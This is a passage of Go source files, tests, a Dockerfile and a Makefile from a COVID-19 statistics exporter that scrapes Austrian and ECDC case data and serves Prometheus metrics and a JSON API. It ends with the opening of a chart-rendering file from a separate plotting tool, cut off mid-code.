errors, result = addVarIfValid(errors, result, h.url+"/SimpleData.js", "Erkrankungen", "cov19_confirmed")
errors, result = addVarIfValid(errors, result, h.url+"/Genesen.js", "dpGenesen", "cov19_healed")
errors, result = addVarIfValid(errors, result, h.url+"/VerstorbenGemeldet.js", "dpTotGemeldet", "cov19_dead")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlNormalbettenBel.js", "dpGesNBBel", "cov19_hospitalized")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlIntensivBettenBel.js", "dpGesIBBel", "cov19_intensive_care")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlTestungen.js", "dpGesTestungen", "cov19_tests")
return result, errors
}
<|start_filename|>helper.go<|end_filename|>
package main
import (
"errors"
"io/ioutil"
"net/http"
"regexp"
"strconv"
"strings"
"time"
)
func atoi(s string) uint64 {
s = strings.ReplaceAll(s, ".", "")
s = strings.ReplaceAll(s, ",", "")
result, err := strconv.ParseUint(s, 10, 64)
if err != nil {
return 0
}
return result
}
func atoif(s string) float64 {
return float64(atoi(s))
}
func atof(s string) float64 {
result, err := strconv.ParseFloat(s, 64)
if err != nil {
return 0
}
return result
}
func ftos(f float64) string {
return strconv.FormatFloat(f, 'f', 6, 64)
}
func fatalityRate(infections uint64, deaths uint64) float64 {
return float64(deaths) / float64(infections)
}
func infectionRate(infections uint64, population uint64) float64 {
return float64(infections) / float64(population)
}
func infection100k(infections uint64, population uint64) float64 {
return infectionRate(infections, population) * float64(100000)
}
func readArrayFromGet(url string) (string, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(url)
if err != nil {
return "", err
}
defer response.Body.Close()
json, err := ioutil.ReadAll(response.Body)
if err != nil {
return "", err
}
jsonString := string(json)
arrayBegin := strings.Index(jsonString, "[")
if arrayBegin == -1 {
return "", errors.New("Could not find beginning of array")
}
arrayEnd := strings.LastIndex(jsonString, "]")
if arrayEnd == -1 {
return "", errors.New("Could not find end of array")
}
return jsonString[arrayBegin : arrayEnd+1], nil
}
func readJsVarFromGet(url string, varName string) (string, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(url)
if err != nil {
return "", err
}
defer response.Body.Close()
lines, err := ioutil.ReadAll(response.Body)
match := regexp.MustCompile(varName + ` = "([0-9\.]+)"`).FindStringSubmatch(string(lines))
if len(match) != 2 {
return "", errors.New(varName + " not found in " + url[strings.LastIndex(url, "/"):])
}
return strings.Replace(match[1], ".", "", 1), nil
}
<|start_filename|>main.go<|end_filename|>
package main
import (
"encoding/json"
"fmt"
"log"
"net/http"
"os"
)
var logger = log.New(os.Stdout, "covid19-at", 0)
var mp = newMetadataProvider()
var he = newHealthMinistryExporter()
var exporters = []Exporter{
he,
newEcdcExporter(mp),
newMathdroExporter(),
}
var a = newApi(he)
func writeJson(w http.ResponseWriter, f func() (interface{}, error)) {
result, err := f()
if err != nil {
w.WriteHeader(500)
w.Write([]byte(err.Error()))
} else {
bytes, err := json.Marshal(result)
if err != nil {
w.WriteHeader(500)
w.Write([]byte(err.Error()))
} else {
w.Header().Add("Content-type", "application/json; charset=utf-8")
w.Write(bytes)
}
}
}
func handleApiBundesland(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetBundeslandStat() })
}
func handleApiBezirk(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetBezirkStat() })
}
func handleApiTotal(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetOverallStat() })
}
func handleMetrics(w http.ResponseWriter, _ *http.Request) {
for _, e := range exporters {
metrics, err := e.GetMetrics()
if err == nil {
writeMetrics(metrics, w)
}
}
}
func handleHealth(w http.ResponseWriter, _ *http.Request) {
errors := make([]error, 0)
for _, e := range exporters {
errors = append(errors, e.Health()...)
}
if len(errors) > 0 {
w.WriteHeader(http.StatusInternalServerError)
errorResponse := ""
for _, e := range errors {
errorResponse += e.Error() + "\n"
}
fmt.Fprintf(w, `<html><body><img width="500" src="https://spiessknafl.at/fine.jpg"/><pre>%s</pre></body></html>`, errorResponse)
} else {
fmt.Fprintf(w, `<html><body><img width="500" src="https://spiessknafl.at/helth.png"/></body></html>`)
}
}
func main() {
http.HandleFunc("/metrics", handleMetrics)
http.HandleFunc("/health", handleHealth)
http.HandleFunc("/api/bundesland", handleApiBundesland)
http.HandleFunc("/api/bezirk", handleApiBezirk)
http.HandleFunc("/api/total", handleApiTotal)
err := http.ListenAndServe(":8282", nil)
if err != nil {
panic(err)
}
}
<|start_filename|>api.go<|end_filename|>
package main
type apiLocaiton struct {
Lat float64
Long float64
}
type bundeslandStat struct {
Name string
Location apiLocaiton
Population uint64
Infected uint64
Dead uint64
Hospitalized uint64
IntensiveCare uint64
Healed uint64
}
type bezirkStat struct {
Name string
Location apiLocaiton
Population uint64
Infected uint64
}
type overallStat struct {
TotalInfected uint64
TotalDead uint64
TotalHospitalized uint64
TotalIntensiveCare uint64
AgeDistributionInfection map[string]uint64
}
type api struct {
he *healthMinistryExporter
}
func newApi(he *healthMinistryExporter) *api {
return &api{he}
}
func (a *api) GetOverallStat() (overallStat, error) {
r := overallStat{}
ageStats, err := a.he.getAgeStat()
if err != nil {
return overallStat{}, err
}
r.AgeDistributionInfection = ageStats
bundeslandStats, err := a.GetBundeslandStat()
d, err2 := a.he.getSimpleData()
if len(err2) != 0 {
return overallStat{}, err2[0]
}
sumInfect := uint64(0)
sumDead := uint64(0)
sumHospitalized := uint64(0)
sumIntensiveCare := uint64(0)
for _, v := range bundeslandStats {
sumInfect += v.Infected
sumDead += v.Dead
sumHospitalized += v.Hospitalized
sumIntensiveCare += v.IntensiveCare
}
r.TotalDead = sumDead
r.TotalInfected = sumInfect
r.TotalHospitalized = sumHospitalized
r.TotalIntensiveCare = sumIntensiveCare
confirmed := d.findMetric("cov19_confirmed", "")
if confirmed != nil {
r.TotalInfected = uint64(confirmed.Value)
}
return r, nil
}
func (a *api) GetBezirkStat() ([]bezirkStat, error) {
return a.he.getBezirkStat()
}
func (a *api) GetBundeslandStat() ([]bundeslandStat, error) {
result := make([]bundeslandStat, 0)
/*for k, v := range bundeslandStats {
data := a.se.mp.getMetadata(k)
hospitalized := uint64(0)
intensiveCare := uint64(0)
if v, ok := hospitalStat[k]; ok {
hospitalized = v.Hospitalized
intensiveCare = v.IntensiveCare
}
result = append(result, bundeslandStat{
Name: k,
Infected: v.infected,
Dead: v.deaths,
Population: data.population,
Hospitalized: hospitalized,
IntensiveCare: intensiveCare,
Location: apiLocaiton{Lat: data.location.lat, Long: data.location.long},
})
}*/
return result, nil
}
<|start_filename|>cmd/location/main.go<|end_filename|>
package main
import (
"encoding/csv"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strconv"
)
type mapsResponse struct {
Candidates []struct {
Geometry struct {
Location struct {
Lat float64
Lng float64
}
}
}
}
type mapLocation struct {
latitude float64
longitude float64
}
func getLocation(location string, key string) (*mapLocation, error) {
response, err := http.Get(fmt.Sprintf("https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=%s&inputtype=textquery&&fields=geometry&key=%s", url.QueryEscape(location), key))
if err != nil {
return nil, err
}
defer response.Body.Close()
bytes, err := ioutil.ReadAll(response.Body)
if err != nil {
return nil, err
}
result := mapsResponse{}
err = json.Unmarshal(bytes, &result)
if err != nil {
return nil, err
}
if len(result.Candidates) == 0 {
return nil, errors.New("Not enough candidates for " + location)
}
return &mapLocation{latitude: result.Candidates[0].Geometry.Location.Lat, longitude: result.Candidates[0].Geometry.Location.Lng}, nil
}
func ftos(f float64) string {
return strconv.FormatFloat(f, 'f', 6, 64)
}
func main() {
args := os.Args[1:]
if len(args) < 1 {
panic("Commandline argument for google maps apikey required")
}
apiKey := args[0]
csvFile, _ := os.Open("bezirke.csv")
r := csv.NewReader(csvFile)
records, _ := r.ReadAll()
for _, r := range records {
location := r[0]
loc, err := getLocation(location, apiKey)
if err != nil {
fmt.Println(err.Error())
}
fmt.Println(fmt.Sprintf("%s,%s,%f,%f", location, r[1], loc.latitude, loc.longitude))
}
}
<|start_filename|>Dockerfile<|end_filename|>
FROM golang:latest as build
WORKDIR /go/src/app
COPY . .
RUN CGO_ENABLED=0 GOOS=linux go build -ldflags="-s -w" .
FROM alpine:latest
RUN apk --no-cache add ca-certificates
WORKDIR /root/
COPY --from=build /go/src/app/metadata.csv .
COPY --from=build /go/src/app/bezirke.csv .
COPY --from=build /go/src/app/covid19-at .
EXPOSE 8282
CMD ["./covid19-at"]
<|start_filename|>mathdro_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"testing"
)
var me = newMathdroExporter()
func TestRecovered(t *testing.T) {
result, err := me.GetMetrics()
assert.Nil(t, err)
assert.True(t, len(result) > 0, len(result))
}
<|start_filename|>api_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"net/http"
"net/http/httptest"
"testing"
)
func TestApiOverall(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiTotal))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
func TestApiBezirk(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiBezirk))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
func TestApiBundesland(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiBundesland))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
<|start_filename|>Makefile<|end_filename|>
.PHONY: test clean
default: build sync-logs
build:
go build -ldflags="-s -w" ./...
du -h covid19-at
image:
docker build -t covid19-at .
test:
GORACE="halt_on_error=1" go test -timeout 5s -race -v -coverprofile="coverage.txt" -covermode=atomic ./...
clean:
rm -f covid19-at coverage.txt data/report*
sync-logs:
mkdir -p data/nginx
rsync -avz covid19.spiessknafl.at:/var/log/nginx/ data/nginx/
report-exporter: sync-logs
gzcat -f data/nginx/* | grep "GET /covid19/metrics\|GET /covid19/api" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-exporter.html --ignore-crawlers
open data/report-exporter.html
report-prometheus: sync-logs
gzcat -f data/nginx/* | grep "/prometheus/api/v1/query\|/api/datasources/proxy/" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-prometheus.html --ignore-crawlers
open data/report-prometheus.html
report-grafana: sync-logs
gzcat -f data/nginx/* | grep "GET /d/\|/impressum.html" | grep -v "/public/\|favicon.ico\|/images/" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-grafana.html --ignore-crawlers
open data/report-grafana.html
reports: report-exporter report-grafana report-prometheus
deploy:
ssh covid19.spiessknafl.at "cd covid19-at && git pull && docker-compose build && docker-compose up --force-recreate -d"
<|start_filename|>ecdc.go<|end_filename|>
package main
import (
"errors"
"fmt"
"net/http"
"strings"
"time"
"unicode"
"github.com/PuerkitoBio/goquery"
)
type ecdcExporter struct {
Url string
Mp *metadataProvider
}
type ecdcStat struct {
CovidStat
continent string
}
func newEcdcExporter(lp *metadataProvider) *ecdcExporter {
return &ecdcExporter{Url: "https://www.ecdc.europa.eu/en/geographical-distribution-2019-ncov-cases", Mp: lp}
}
//GetMetrics parses the ECDC table
func (e *ecdcExporter) GetMetrics() (metrics, error) {
stats, err := getEcdcStat(e.Url)
if err != nil {
return nil, err
}
result := make([]metric, 0)
for i := range stats {
tags := e.getTags(stats, i)
deaths := stats[i].deaths
infected := stats[i].infected
population := e.Mp.getPopulation(stats[i].location)
if deaths > 0 {
result = append(result, metric{Name: "cov19_world_death", Value: float64(deaths), Tags: &tags})
if population > 0 {
result = append(result, metric{Name: "cov19_world_fatality_rate", Value: fatalityRate(infected, deaths), Tags: &tags})
}
}
result = append(result, metric{Name: "cov19_world_infected", Value: float64(infected), Tags: &tags})
if population > 0 {
result = append(result, metric{Name: "cov19_world_infection_rate", Value: infectionRate(infected, population), Tags: &tags})
result = append(result, metric{Name: "cov19_world_infected_per_100k", Value: infection100k(infected, population), Tags: &tags})
}
}
return result, nil
}
//Health checks the functionality of the exporter
func (e *ecdcExporter) Health() []error {
errors := make([]error, 0)
worldStats, _ := e.GetMetrics()
if len(worldStats) < 200 {
errors = append(errors, fmt.Errorf("World stats are failing"))
}
for _, m := range worldStats {
country := (*m.Tags)["country"]
if mp.getLocation(country) == nil {
errors = append(errors, fmt.Errorf("Could not find location for country: %s", country))
}
}
return errors
}
func normalizeCountryName(name string) string {
name = strings.TrimSpace(name)
parts := strings.FieldsFunc(name, func(r rune) bool { return r == ' ' || r == '_' })
for i, part := range parts {
if strings.ToUpper(part) == "AND" || strings.ToUpper(part) == "OF" {
parts[i] = strings.ToLower(part)
} else {
runes := []rune(part)
parts[i] = string(unicode.ToUpper(runes[0])) + strings.ToLower(string(runes[1:]))
}
}
return strings.Join(parts, " ")
}
func (e *ecdcExporter) getTags(stats []ecdcStat, i int) map[string]string {
var tags map[string]string
if e.Mp != nil && e.Mp.getLocation(stats[i].location) != nil {
location := e.Mp.getLocation(stats[i].location)
tags = map[string]string{"country": stats[i].location, "continent": stats[i].continent, "latitude": ftos(location.lat), "longitude": ftos(location.long)}
} else {
tags = map[string]string{"country": stats[i].location, "continent": stats[i].continent}
}
return tags
}
func getEcdcStat(url string) ([]ecdcStat, error) {
client := http.Client{Timeout: 3 * time.Second}
response, err := client.Get(url)
if err != nil {
return nil, err
}
defer response.Body.Close()
document, _ := goquery.NewDocumentFromReader(response.Body)
rows := document.Find("table").Find("tbody").Find("tr")
if rows.Size() == 0 {
return nil, errors.New("Could not find table")
}
result := make([]ecdcStat, 0)
rows.Each(func(i int, s *goquery.Selection) {
if i < rows.Size()-1 {
rowStart := s.Find("td").First()
location := normalizeCountryName(rowStart.Next().Text())
infections := atoi(rowStart.Next().Next().Text())
deaths := atoi(rowStart.Next().Next().Next().Text())
if (infections > 0 || deaths > 0) && location != "Other" {
result = append(result, ecdcStat{
CovidStat{
location: location,
infected: infections,
deaths: deaths,
},
rowStart.Text(),
})
}
}
})
return result, nil
}
<|start_filename|>metadata.go<|end_filename|>
package main
import (
"encoding/csv"
"log"
"os"
"regexp"
"strings"
)
type metadataProvider struct {
data map[string]metaData
}
type location struct {
lat float64
long float64
}
type metaData struct {
location location
country string
population uint64
}
func normalizeName(name string) string {
space := regexp.MustCompile(`[^A-Za-z]+`)
result := strings.ToUpper(space.ReplaceAllString(name, ""))
return result
}
func newMetadataProvider() *metadataProvider {
return newMetadataProviderWithFilename("metadata.csv")
}
func newMetadataProviderWithFilename(filename string) *metadataProvider {
csvFile, err := os.Open(filename)
if err != nil {
log.Print(err)
return nil
}
r := csv.NewReader(csvFile)
records, err := r.ReadAll()
if err != nil {
log.Print(err)
return nil
}
data := make(map[string]metaData, len(records))
for _, row := range records {
data[normalizeName(row[0])] = metaData{location{atof(row[2]), atof(row[3])}, row[0], atoi(row[1])}
}
return &metadataProvider{data: data}
}
func (l *metadataProvider) getMetadata(location string) *metaData {
if l, ok := l.data[normalizeName(location)]; ok {
return &l
}
return nil
}
//getLocation returns lat/long for a location name
func (l *metadataProvider) getLocation(location string) *location {
if l, ok := l.data[normalizeName(location)]; ok {
return &l.location
}
return nil
}
//getPopulation for a given location by name
func (l *metadataProvider) getPopulation(location string) uint64 {
if l, ok := l.data[normalizeName(location)]; ok {
return l.population
}
return 0
}
<|start_filename|>mathdro.go<|end_filename|>
package main
import (
"encoding/json"
"io/ioutil"
"net/http"
"time"
)
type mathdroExporter struct {
url string
}
type recoveredStats []struct {
ProvinceState *string
CountryRegion string
Recovered uint64
Lat float64
Long float64
}
func newMathdroExporter() *mathdroExporter {
return &mathdroExporter{url: "https://covid19.mathdro.id/api/"}
}
func (me *mathdroExporter) GetMetrics() (metrics, error) {
recovered, err := me.getRecoveredStats()
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, r := range recovered {
tags := map[string]string{"country": r.CountryRegion, "latitude": ftos(r.Lat), "longitude": ftos(r.Long)}
if r.ProvinceState != nil {
tags["province"] = *r.ProvinceState
}
result = append(result, metric{Name: "cov19_world_recovered", Tags: &tags, Value: float64(r.Recovered)})
}
return result, nil
}
func (me *mathdroExporter) Health() []error {
_, err := me.GetMetrics()
if err != nil {
return []error{err}
}
return nil
}
func (me *mathdroExporter) getRecoveredStats() (recoveredStats, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(me.url + "recovered")
if err != nil {
return nil, err
}
defer response.Body.Close()
jsonString, err := ioutil.ReadAll(response.Body)
if err != nil {
return nil, err
}
recoveredStats := make(recoveredStats, 0)
err = json.Unmarshal(jsonString, &recoveredStats)
if err != nil {
return nil, err
}
return recoveredStats, nil
}
<|start_filename|>healthministry_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"testing"
)
var e = newHealthMinistryExporter()
func TestBezirke(t *testing.T) {
result, err := e.getBezirke()
assert.Nil(t, err)
assert.True(t, len(result) > 10, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
}
func TestBundesland(t *testing.T) {
result, err := e.getBundeslandInfections()
assert.Nil(t, err)
assert.True(t, len(result) == 3*9, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
vienna := result.findMetric("cov19_detail", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
assert.NotNil(t, result.findMetric("cov19_detail_infection_rate", "province=Salzburg"))
infectionRate := result.findMetric("cov19_detail_infection_rate", "province=Wien")
assert.NotNil(t, infectionRate)
assert.True(t, infectionRate.Value > 0 && infectionRate.Value < 1, infectionRate.Value)
infected100k := result.findMetric("cov19_detail_infected_per_100k", "province=Wien")
assert.NotNil(t, infected100k)
assert.True(t, infected100k.Value > 5 && infected100k.Value < 100, infected100k.Value)
}
func TestBundeslandHealedDeaths(t *testing.T) {
result, err := e.getBundeslandHealedDeaths()
assert.Nil(t, err)
assert.True(t, len(result) == 2*9, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
vienna := result.findMetric("cov19_detail_dead", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
vienna = result.findMetric("cov19_detail_healed", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
assert.NotNil(t, result.findMetric("cov19_detail_dead", "province=Salzburg"))
assert.NotNil(t, result.findMetric("cov19_detail_healed", "province=Salzburg"))
}
func TestAltersverteilung(t *testing.T) {
result, err := e.getAgeMetrics()
assert.Nil(t, err)
assert.True(t, len(result) >= 4, len(result))
for _, s := range result {
assert.Equal(t, 2, len(*s.Tags), s.Tags)
}
}
func TestGeschlechtsVerteilung(t *testing.T) {
result, _ := e.getGeschlechtsVerteilung()
assert.Equal(t, 2, len(result))
assert.Equal(t, int64(100), int64(result[0].Value+result[1].Value))
}
func TestSimpleData(t *testing.T) {
result, err := e.getSimpleData()
assert.Equal(t, 0, len(err))
assert.NotNil(t, result.findMetric("cov19_confirmed", ""))
assert.NotNil(t, result.findMetric("cov19_hospitalized", ""))
assert.NotNil(t, result.findMetric("cov19_intensive_care", ""))
}
func TestHealthMinistryHealth(t *testing.T) {
errors := e.Health()
assert.Equal(t, 0, len(errors))
}
func TestHealthMinistryGetMetrics(t *testing.T) {
result, err := e.GetMetrics()
assert.Nil(t, err, err)
assert.NotNil(t, result)
}
<|start_filename|>metadata_test.go<|end_filename|>
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
var p = newMetadataProvider()
func TestAustriaLocations(t *testing.T) {
assert.NotNil(t, p.getLocation("Wien"))
assert.NotNil(t, p.getLocation("Kärnten"))
assert.NotNil(t, p.getLocation("Steiermark"))
assert.NotNil(t, p.getLocation("Burgenland"))
assert.NotNil(t, p.getLocation("Niederösterreich"))
assert.NotNil(t, p.getLocation("Oberösterreich"))
assert.NotNil(t, p.getLocation("Salzburg"))
assert.NotNil(t, p.getLocation("Tirol"))
assert.NotNil(t, p.getLocation("Vorarlberg"))
}
func TestLocationsForMetrics(t *testing.T) {
metrics, err := newEcdcExporter(p).GetMetrics()
assert.Nil(t, err)
for _, m := range metrics {
country := (*m.Tags)["country"]
assert.NotNil(t, p.getLocation(country), "Country lookup: "+country)
}
}
func TestLocationsPopulationForMetrics(t *testing.T) {
metrics, err := newEcdcExporter(p).GetMetrics()
assert.Nil(t, err)
for _, m := range metrics {
country := (*m.Tags)["country"]
assert.True(t, p.getPopulation(country) > 0, "Population lookup: "+country)
}
}
func TestMetadataForBezirke(t *testing.T) {
healthMinistryExporter := newHealthMinistryExporter()
metrics, err := healthMinistryExporter.getBezirke()
assert.Nil(t, err)
for _, m := range metrics {
bezirk := (*m.Tags)["bezirk"]
assert.True(t, healthMinistryExporter.mp.getPopulation(bezirk) > 0, "Population lookup: "+bezirk)
assert.True(t, healthMinistryExporter.mp.getLocation(bezirk) != nil, "location lookup: "+bezirk)
}
}
func TestUnknownLocation(t *testing.T) {
assert.Nil(t, p.getLocation("xxxxx"))
assert.Equal(t, uint64(0), p.getPopulation("xxxxx"))
assert.Nil(t, p.getMetadata("xxxxx"))
assert.Nil(t, newMetadataProviderWithFilename("someinvalidfile"))
}
<|start_filename|>ecdc_test.go<|end_filename|>
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestNormalizeName(t *testing.T) {
assert.Equal(t, "Saudi Arabia", normalizeCountryName("Saudi_Arabia"))
assert.Equal(t, "Canada", normalizeCountryName("CANADA"))
assert.Equal(t, "United States of America", normalizeCountryName("United_States_of_America"))
assert.Equal(t, "Antigua and Barbuda", normalizeCountryName("Antigua_and_Barbuda"))
}
func TestEcdcStats(t *testing.T) {
ecdc := newEcdcExporter(newMetadataProvider())
result, err := ecdc.GetMetrics()
assert.Nil(t, err)
assert.True(t, len(result) > 0)
china := result.findMetric("cov19_world_death", "country=China")
assert.NotNil(t, china)
assert.Equal(t, (*china.Tags)["continent"], "Asia")
assert.Equal(t, (*china.Tags)["latitude"], "35.861660")
assert.Equal(t, (*china.Tags)["longitude"], "104.195397")
assert.True(t, china.Value > 3000)
china = result.findMetric("cov19_world_infected", "country=China")
assert.NotNil(t, china)
assert.Equal(t, (*china.Tags)["continent"], "Asia")
assert.Equal(t, (*china.Tags)["latitude"], "35.861660")
assert.Equal(t, (*china.Tags)["longitude"], "104.195397")
assert.True(t, china.Value > 10000)
china = result.findMetric("cov19_world_infected", "country=Bosnia and Herzegovina")
assert.NotNil(t, china)
assert.Equal(t, (*china.Tags)["continent"], "Europe")
assert.Equal(t, (*china.Tags)["latitude"], "43.915886")
assert.Equal(t, (*china.Tags)["longitude"], "17.679076")
assert.True(t, china.Value > 10)
}
<|start_filename|>prometheus.go<|end_filename|>
package main
import (
"fmt"
"io"
"strings"
)
type metrics []metric
type metric struct {
Name string
Tags *map[string]string
Value float64
}
type CovidStat struct {
location string
infected uint64
deaths uint64
}
type Exporter interface {
GetMetrics() (metrics, error)
Health() []error
}
func writeMetrics(metrics metrics, w io.Writer) error {
for _, m := range metrics {
_, err := io.WriteString(w, formatMetric(m))
if err != nil {
return err
}
}
return nil
}
func formatMetric(m metric) string {
tags := []string{}
if m.Tags != nil {
for k, v := range *m.Tags {
tags = append(tags, k+`="`+v+`"`)
}
return fmt.Sprintf("%s{%s} %f\n", m.Name, strings.Join(tags, ","), m.Value)
}
return fmt.Sprintf("%s %f\n", m.Name, m.Value)
}
func (metrics metrics) findMetric(metricName string, tagMatch string) *metric {
for _, m := range metrics {
if m.Name == metricName && tagMatch == "" {
return &m
} else if m.Name == metricName {
for k, v := range *m.Tags {
if fmt.Sprintf("%s=%s", k, v) == tagMatch {
return &m
}
}
}
}
return nil
}
func (metrics metrics) checkMetric(metricName, tagMatch string, checkFunction func(x float64) bool) error {
metric := metrics.findMetric(metricName, tagMatch)
if metric == nil {
return fmt.Errorf("Could not find metric %s / (%s)", metricName, tagMatch)
}
if !checkFunction((*metric).Value) {
return fmt.Errorf("Check metric for metric %s / (%s) failed with value: %f", metricName, tagMatch, (*metric).Value)
}
return nil
}
<|start_filename|>main_test.go<|end_filename|>
package main
import (
"io/ioutil"
"net/http"
"net/http/httptest"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestHealth(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleHealth))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 200, response.StatusCode)
greeting, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
assert.Equal(t, "<html><body><img width=\"500\" src=\"https://spiessknafl.at/helth.png\"/></body></html>", string(greeting))
}
func emptyPage(w http.ResponseWriter, r *http.Request) {
w.Write([]byte("<html></html>"))
}
func TestErrors(t *testing.T) {
healthMinistryExporter := exporters[0].(*healthMinistryExporter)
ecdcExporter := exporters[1].(*ecdcExporter)
ecdcURL := ecdcExporter.Url
healthMinistryURL := healthMinistryExporter.url
mockServer := httptest.NewServer(http.HandlerFunc(emptyPage))
defer mockServer.Close()
ecdcExporter.Url = mockServer.URL
healthMinistryExporter.url = mockServer.URL
ts := httptest.NewServer(http.HandlerFunc(handleHealth))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 500, response.StatusCode)
greeting, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
assert.Equal(t, `<html><body><img width="500" src="https://spiessknafl.at/fine.jpg"/><pre>Could not find beginning of array
Not enough Bezirke Results: 0
Could not find beginning of array
Missing Bundesland result 0
Could not find beginning of array
Missing age metrics
Could not find beginning of array
Geschlechtsverteilung failed
Erkrankungen not found in /SimpleData.js
dpGenesen not found in /Genesen.js
dpTotGemeldet not found in /VerstorbenGemeldet.js
dpGesNBBel not found in /GesamtzahlNormalbettenBel.js
dpGesIBBel not found in /GesamtzahlIntensivBettenBel.js
dpGesTestungen not found in /GesamtzahlTestungen.js
Could not find "Bestätigte Fälle"
World stats are failing
</pre></body></html>`, string(greeting))
ecdcExporter.Url = ecdcURL
healthMinistryExporter.url = healthMinistryURL
}
func TestMetrics(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleMetrics))
defer ts.Close()
response, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
assert.Equal(t, 200, response.StatusCode)
metricsString, err := ioutil.ReadAll(response.Body)
assert.Nil(t, err)
metricResult := string(metricsString)
assert.True(t, strings.Contains(metricResult, "cov19_tests"))
assert.True(t, strings.Contains(metricResult, "cov19_confirmed"))
assert.True(t, strings.Contains(metricResult, "cov19_healed"))
assert.True(t, strings.Contains(metricResult, "cov19_world_infected"))
assert.True(t, strings.Contains(metricResult, "cov19_world_death"))
assert.True(t, strings.Contains(metricResult, "cov19_detail"))
assert.True(t, strings.Contains(metricResult, "cov19_detail_dead"))
}
| cinemast/covid19-at |
<|start_filename|>graph/graph.go<|end_filename|>
package graph
import (
"fmt"
"math"
humanize "github.com/dustin/go-humanize"
"github.com/rs/jplot/data"
chart "github.com/wcharczuk/go-chart"
"github.com/wcharczuk/go-chart/drawing"
)
func init() {
chart.DefaultBackgroundColor = chart.ColorTransparent
chart.DefaultCanvasColor = chart.ColorTransparent
chart.DefaultTextColor = drawing.Color{R: 180, G: 180, B: 180, A: 255}
chart.DefaultAxisColor = drawing.Color{R: 180, G: 180, B: 180, A: 255}
chart.DefaultAnnotationFillColor = chart.ColorBlack.WithAlpha(200)
}
// New generate a line graph with series.
func New(spec data.Spec, dp *data.Points, width, height int) chart.Chart {
series := []chart.Series{}
markers := []chart.GridLine{}
for _, f := range spec.Fields {
vals := dp.Get(f.ID)
if f.IsMarker {
for i, v := range vals {
if v > 0 {
markers = append(markers, chart.GridLine{Value: float64(i)})
}
}
continue
}
series = append(series, chart.ContinuousSeries{
Name: fmt.Sprintf("%s: %s", f.Name, siValueFormater(vals[len(vals)-1])),
YValues: vals,
})
}
return newChart(series, markers, width, height)
}
func newChart(series []chart.Series, markers []chart.GridLine, width, height int) chart.Chart {
var min, max float64 = math.MaxFloat64, -math.MaxFloat64
for i, s := range series {
if s, ok := s.(chart.ContinuousSeries); ok {
min, max = minMax(s.YValues, min, max)
s.XValues = chart.LinearRange(0, float64(len(s.YValues)-1))
c := chart.GetAlternateColor(i + 4)
s.Style = chart.Style{
Hidden: false,
StrokeWidth: 2,
StrokeColor: c,
FillColor: c.WithAlpha(20),
FontSize: 9,
}
series[i] = s
last := chart.LastValueAnnotationSeries(s, siValueFormater)
last.Style.FillColor = c
last.Style.FontColor = textColor(c)
last.Style.FontSize = 9
last.Style.Padding = chart.NewBox(2, 2, 2, 2)
series = append(series, last)
}
}
graph := chart.Chart{
Width: width,
Height: height,
Background: chart.Style{
Padding: chart.NewBox(5, 0, 0, 5),
},
YAxis: chart.YAxis{
Style: chart.Shown(),
ValueFormatter: siValueFormater,
},
Series: series,
}
if min == max {
// By default, go-chart will fail to render a flat line as the range will be NaN.
// Define a manual range in such case.
// See https://github.com/wcharczuk/go-chart/issues/31
graph.YAxis.Range = &chart.ContinuousRange{
Min: min - 0.05,
Max: max + 0.05,
}
}
if len(markers) > 0 {
graph.Background.Padding.Bottom = 0 // compensate transparent tick space
graph.XAxis = chart.XAxis{
Style: chart.Shown(),
